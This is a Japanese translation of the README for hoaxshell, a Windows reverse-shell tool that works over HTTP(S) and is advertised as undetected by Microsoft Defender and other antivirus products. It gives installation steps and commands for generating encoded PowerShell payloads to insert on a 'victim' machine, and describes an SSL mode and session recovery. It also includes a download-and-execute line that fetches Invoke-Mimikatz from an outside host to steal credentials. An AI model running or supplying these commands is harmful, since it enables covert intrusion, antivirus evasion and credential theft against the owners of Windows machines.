hoaxshell - http(s) トラフィックのみに基づいて、現在 Microsoft Defender やその他のさまざまな AV ソリューションによって検出されていない、型にはまらない Windows リバース シェル。

(An unconventional Windows reverse shell, currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic. )

Created at: 2022-07-10 23:36:24
Language: Python
License: BSD-2-Clause

デマの殻

Python 3.x ライセンス

目的

hoaxshell は型にはまらない Windows リバース シェルであり、http(s) トラフィックのみに基づいているため、現在 Microsoft Defender やおそらく他の AV ソリューションでは検出されていません。このツールは使いやすく、独自の PowerShell ペイロードを生成し、暗号化 (ssl) をサポートしています。

これまでのところ、完全に更新されたWindows 11 EnterpriseおよびWindows 10 Proボックスでテストされています (ビデオとスクリーンショットを参照してください)。

ビデオプレゼンテーション

https://www.youtube.com/watch?v=SEufgD5UxdU

スクリーンショット

使用例_png

その他のスクリーンショットはこちら.

インストール

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

使用法

重要: 検出を回避する手段として、hoaxshell は、スクリプトが開始されるたびに、セッション ID、URL パス、およびプロセスで使用されるカスタム http ヘッダーの名前のランダムな値を自動的に生成します。生成されたペイロードは、生成されたインスタンスに対してのみ機能します。オプションを使用して、

-g
この動作をバイパスし、アクティブなセッションを再確立するか、過去に生成されたペイロードを Hoaxshell の新しいインスタンスで再利用します。

http を介した基本的なシェル セッション

sudo python3 hoaxshell.py -s <your_ip>

Hoaxshell を実行すると、独自の PowerShell ペイロードが生成され、コピーして被害者に挿入できます。デフォルトでは、便宜上、ペイロードは base64 でエンコードされています。生のペイロードが必要な場合は、「rawpayload」プロンプト コマンドを実行するか、

-r
引数を指定して Hoaxshell を開始します。被害者でペイロードが実行されると、それに対して PowerShell コマンドを実行できるようになります。

暗号化されたシェル セッション (https):

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

生成された PowerShell ペイロードは、ssl 証明書の検証を無効にするコード ブロックが追加されるため、長さが長くなります。

グラブ セッション モード

端末を誤って閉じた場合、停電などが発生した場合は、被害者のマシンでペイロードがまだ実行されていることを考えると、グラブ セッション モードで Hoaxshell を開始できます。セッションの再確立が試行されます。

sudo python3 hoaxshell.py -s <your_ip> -g

重要: 復元しようとしているセッションと同じ設定 (http/https、ポートなど) で Hoaxshell を開始してください。

制限事項

対話型セッションを開始するコマンドを実行すると、シェルがハングします。例:

# this command will execute succesfully and you will have no problem: 
> powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
> powershell

# In the same manner, you won't have a problem executing this:
> cmd /c dir /a

# But this will cause your hoaxshell to hang:
> cmd.exe

たとえば、hoaxshell を介して mimikatz を実行したい場合は、次のコマンドを呼び出す必要があります。

hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

簡単に言うと、Hoaxshell PowerShell コンテキスト内でインタラクティブ セッションを開始する exe または cmd を実行しないように注意する必要があります。

未来

私は現在、ホスト列挙の一部を自動化するための補助タイプのプロンプト コマンドに取り組んでいます。